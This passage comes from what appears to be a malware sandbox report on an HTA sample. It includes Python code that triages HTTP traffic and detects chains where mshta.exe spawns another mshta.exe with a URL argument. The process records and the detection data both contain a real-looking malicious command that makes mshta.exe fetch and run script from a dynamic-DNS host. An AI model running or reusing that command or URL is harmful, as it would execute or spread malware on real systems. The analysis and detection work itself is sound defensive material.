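    "Keep-Alive: timeout=5, max=100\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/postscript\r\n"
    "\r\n"
)

# Illustrative tables for this example (not exhaustive, not from the report).
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
DDNS_ZONES = ("hopto.org", "zapto.org", "no-ip.org", "no-ip.biz", "ddns.net", "duckdns.org")
EXPECTED_TYPE = {
    ".pptx": "application/vnd.openxmlformats-officedocument.presentationml.presentation",
    ".docx": "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
    ".pdf": "application/pdf",
}


def parse_message(raw):
    """Split a raw HTTP/1.x message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers, body


def triage_exchange(raw_request, raw_response, process):
    """Findings for one request/response pair issued by `process` (full image path)."""
    req_line, req, _ = parse_message(raw_request)
    status_line, resp, body = parse_message(raw_response)
    path = req_line.split(" ")[1]
    status = int(status_line.split(" ")[1])
    proc = process.replace("\\", "/").rsplit("/", 1)[-1].lower()
    findings = []

    # Free dynamic-DNS hosts are cheap, disposable and re-pointable at will.
    host = req.get("host", "").lower()
    if any(host == z or host.endswith("." + z) for z in DDNS_ZONES):
        findings.append(f"dynamic-DNS host {host}")

    # The MSIE 7.0 / Trident/7.0 string is what WinINet sends for non-browser clients.
    ua = req.get("user-agent", "")
    if "MSIE 7.0" in ua and "Trident/7.0" in ua and proc not in BROWSERS:
        findings.append(f"IE-compatibility User-Agent (WinINet/urlmon default) from {proc}")

    # A document extension in the path that the server does not back with the matching type.
    filename = path.rsplit("/", 1)[-1]
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ctype = resp.get("content-type", "").split(";")[0].strip().lower()
    if ext in EXPECTED_TYPE and ctype and ctype != EXPECTED_TYPE[ext]:
        findings.append(f"path extension {ext} but Content-Type {ctype}")

    # 2xx with nothing in it: the stage was withheld (gated, or already taken down).
    length = int(resp.get("content-length", len(body)))
    if 200 <= status < 300 and length == 0:
        findings.append("2xx with empty body: second stage was not served during analysis, "
                        "so the clean verdict says nothing about the payload")
    return findings


if __name__ == "__main__":
    for f in triage_exchange(RAW_REQUEST, RAW_RESPONSE, r"C:\Windows\SysWOW64\mshta.exe"):
        print("-", f)
```

The last finding is the one to act on: an analysis score of 2 here reflects a server that returned nothing, not a harmless file, so the sample should be re-run or the URL re-fetched from a different egress before the verdict is trusted.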



                                Target ID:0
                                Start time:08:28:07
                                Start date:22/04/2025
                                Path:C:\Windows\SysWOW64\mshta.exe
                                Wow64 process (32bit):true
                                Commandline:mshta.exe "C:\Users\user\Desktop\2-12749-25_21.04.2025.HTA.hta"
                                Imagebase:0xaf0000
                                File size:13'312 bytes
                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:1
                                Start time:08:28:08
                                Start date:22/04/2025
                                Path:C:\Windows\SysWOW64\mshta.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\system32\mshta.exe" http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx
                                Imagebase:0xaf0000
                                File size:13'312 bytes
                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false
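The two process records above are the chain that matters: mshta.exe running the local .hta starts a second mshta.exe whose argument is a URL rather than a file. The detection below is an added example, not a Joe Sandbox signature, that applies that rule to constructed Sysmon Event ID 1 style records. The image paths and command lines of the two mshta.exe processes and the PID 2004 of the second one are taken from the report; the explorer.exe parent, the PID of the first mshta.exe and the benign control record are made up. It also flags mshta.exe started by an Office application, which this report does not show but is the other common delivery path.

```python
import re

# Constructed Sysmon Event ID 1 style records modelled on the process chain in
# this report. Image paths and command lines of the two mshta.exe processes and
# PID 2004 come from the report; explorer.exe, PID 7001 and the benign record
# with PID 5120 are invented for the example.
EVENTS = [
    {"pid": 4040, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 7001, "ppid": 4040, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmd": r'mshta.exe "C:\Users\user\Desktop\2-12749-25_21.04.2025.HTA.hta"'},
    {"pid": 2004, "ppid": 7001, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmd": r'"C:\Windows\system32\mshta.exe" http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx'},
    # benign control: a locally installed HTA run from explorer.exe (constructed)
    {"pid": 5120, "ppid": 4040, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
]

URL_RE = re.compile(r"\bhttps?://", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(event, by_pid):
    """'child <- parent <- ...' image names, stopping at a missing or cyclic PID."""
    names, seen = [], set()
    while event is not None and event["pid"] not in seen:
        seen.add(event["pid"])
        names.append(basename(event["image"]))
        event = by_pid.get(event["ppid"])
    return " <- ".join(names)


def detect_mshta_chains(events):
    """Alert on mshta.exe given a URL, spawned by mshta.exe, or spawned by Office."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]) != "mshta.exe":
            continue
        reasons = []
        if URL_RE.search(e["cmd"]):
            reasons.append("mshta.exe given a URL instead of a local .hta (remote script execution)")
        parent = by_pid.get(e["ppid"])
        if parent is not None:
            pname = basename(parent["image"])
            if pname == "mshta.exe":
                reasons.append("parent is mshta.exe (HTA staging a second mshta)")
            elif pname in OFFICE_PARENTS:
                reasons.append(f"parent is Office application {pname}")
        if reasons:
            alerts.append({"pid": e["pid"], "chain": ancestry(e, by_pid), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_mshta_chains(EVENTS):
        print(f"PID {alert['pid']}: {alert['chain']}")
        for r in alert["reasons"]:
            print("  -", r)
```

The first mshta.exe (local .hta from explorer.exe) is deliberately not alerted on, because that is how every HTA runs; it is the URL argument and the mshta-under-mshta parentage that single out PID 2004. Note the command line says system32\mshta.exe while the image is SysWOW64\mshta.exe, which is file-system redirection for the 32-bit process, so match on the image name rather than on the literal path in the command line.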

                                No disassembly